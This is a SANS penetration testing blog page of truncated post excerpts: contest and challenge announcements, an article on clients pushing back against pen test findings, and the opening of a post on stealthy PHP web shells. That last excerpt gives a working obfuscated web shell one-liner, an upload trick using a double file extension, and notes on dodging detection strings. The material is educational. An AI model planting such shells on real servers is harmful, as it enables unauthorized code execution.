Blog: SANS Penetration Testing

Blog: SANS Penetration Testing

Winner Announcement: SANS Pen Test Hackfest Twitter Contest

Over the past couple of weeks, we've been running the SANS Pen Test Hackfest Twitter Contest. I'm delighted to announce the winner. The contest was simple and fun -- just submit a picture of yourself via Twitter with SANS coins, SANS books, or other SANS shwag, and we'll choose a winner at ramdom. We've had some great entries... you guys are a creative group! If you want to see them all, just do a Twitter search for the hashtag #SANSHackfest.

The winner will receive free entry to the 2-Day Summit associated with our November 13 through 20 Pen Test Hackfest training event in Washington DC. We throw everything we've got into this extra special event, including:


  • Two days of amazing, in-depth talks by leading minds of the industry, including the authors of some of the best pen test tools on the planet, including SET,
...

SANS Pen Test Hackfest Twitter Contest

We're delighted to announce a new Twitter-based contest here with a fantastic prize. And, participating in this one is really easy. Check it out.

On November 13 through 20, SANS will be running our second annual Pen Test Hackfest training eventin Washington DC. We throw everything we've got into this extra special event, including:

...

Announcing the Awesome New SANS Brochure Challenge

Here's some fun news. SANS just released a new kind of challenge — one that unfolds from the pages of a SANS brochure itself. Created by Jeff McJunkin and a group of challenge-writing collaborators, we launched it this week with the mailing of the SANS Network Security brochure for the upcoming conference in Las Vegas in October 2014. This challenge will take you across many domains of knowledge, including (but not limited to!): infosec fundamentals, pen testing, digital forensics, steganography, social media, mobile devices, and much, much more, all wrapped up in some geeky fun!

You'll enjoy all these areas and more from the comfort of your brochure (paper or pdf) and local computer, along with everyone's favorite global network, the Internet itself. You'll be able to advance all the way through this challenge from anywhere in the world. If

...

Dealing with the Many Stages of Pen Test Result Grief - Part 2

By Ed Skoudis

In this series of articles, we're looking at some of the grief that penetration testers often encounter when they deliver their results and recommendations. Our premise? You, a great pen tester, work your tail off to conduct a wonderful, high-value, technically awesome pen test. The result? Target system personnel vomit all over your findings, push back on your recommendation, and just plain don't see the value of what you've done. The series, which began with article one here, focuses on practical tips you can use to avoid such situations up front, or, if they do occur later on, methods for defusing the situation and demonstrating the real value you are providing.

Article 1 in the series

...

Sneaky Stealthy SU in (Web) Shells

[In this article, the inimitable Tim Medin has some fun with PHP web shells, and merges together some clever ideas for interacting with them in a rather stealthier fashion using some Python kung fu! --Ed.]

By: Tim Medin

Here is the scenario: you have a server that allows you to upload an avatar. The site makes sure that the file ends with .jpg, .png, or .gif. Being the sneaky bugger you are (as a professional penetration tester operating within your scope and rules of engagement, naturally), you upload a file named shell.php.jpg, containing this delightful gem:

<?php @extract($_REQUEST); @die ($ctime($atime)); ?>

This file passes the extention check, but since it contains .php in the filename, many systems will execute it as a script. Also, this shell doesn't include the telltale "/bin/sh", "shell_exec", or "system" strings and it looks like some sort of ...